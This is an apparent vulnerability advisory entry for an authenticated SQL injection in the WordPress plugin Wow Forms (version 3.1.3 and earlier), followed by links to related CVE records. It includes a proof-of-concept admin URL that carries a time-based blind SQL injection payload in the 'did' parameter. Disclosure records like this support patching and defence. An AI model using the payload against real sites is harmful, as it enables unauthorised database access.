Lucene search
WpvulndbWPEX-ID:D742AB35-4E2D-42A8-BEBC-B953B2E10E3CHistoryOct 07, 2021 - 12:00 a.m.
Wow Forms <= 3.1.3 - Admin+ SQL Injection
2021-10-0700:00:00
wpvulndb
122
wow forms
version 3.1.3
admin
sql injection
wordpress
EPSS
0.001
Percentile
45.2%
The plugin does not sanitise or escape a ‘did’ GET parameter before using it in a SQL statement, when deleting a form in the admin dashboard, leading to an authenticated SQL injection
https://plugins.trac.wordpress.org/browser/mwp-forms/trunk/admin/partials/main.php#L13
As admin, https://example.com/wp-admin/admin.php?page=mwp-forms&info=del&did=1%20AND%20(SELECT%209063%20FROM%20(SELECT(SLEEP(5)))YGWC)Related
patchstack
patchstack
WordPress Wow Forms plugin <= 3.1.3 - SQL Injection (SQLi) vulnerability
2021-10-07 00:00:00
cve
cve
CVE-2021-24628
2021-11-08 18:15:08
cnvd
cnvd
WordPress Wow Forms Plugin SQL Injection Vulnerability (CNVD-2021-99632)
2021-11-10 00:00:00
wpvulndb
wpvulndb
Wow Forms <= 3.1.3 - Admin+ SQL Injection
2021-10-07 00:00:00
nvd
nvd
CVE-2021-24628
2021-11-08 18:15:08
prion
prion
Sql injection
2021-11-08 18:15:00
cvelist
cvelist
CVE-2021-24628 Wow Forms <= 3.1.3 - Admin+ SQL Injection
2021-11-08 17:34:51